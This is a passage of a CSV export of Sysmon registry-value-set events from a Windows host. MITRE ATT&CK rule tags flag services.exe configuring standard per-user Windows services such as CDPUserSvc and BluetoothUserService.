service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.997619500Z"",""eventRecordID"":""519"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 10:25:40.140",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.997386000Z"",""eventRecordID"":""518"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.124",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.996413100Z"",""eventRecordID"":""517"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 10:25:40.111",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.996198400Z"",""eventRecordID"":""516"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.096",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.995363200Z"",""eventRecordID"":""515"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.078",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.994898200Z"",""eventRecordID"":""514"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3ea3f\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 10:25:40.052",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.991991400Z"",""eventRecordID"":""513"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 10:25:40.038",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.991359400Z"",""eventRecordID"":""512"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:39.992",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.989431900Z"",""eventRecordID"":""511"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 10:25:39.972",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.988868400Z"",""eventRecordID"":""510"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:39.942",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.949547400Z"",""eventRecordID"":""509"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 10:25:39.915",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.949183100Z"",""eventRecordID"":""508"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:39.848",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.947818600Z"",""eventRecordID"":""507"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 10:25:39.739",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.947480600Z"",""eventRecordID"":""506"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:39.722",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.946158400Z"",""eventRecordID"":""505"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 10:25:39.585",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.945947200Z"",""eventRecordID"":""504"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 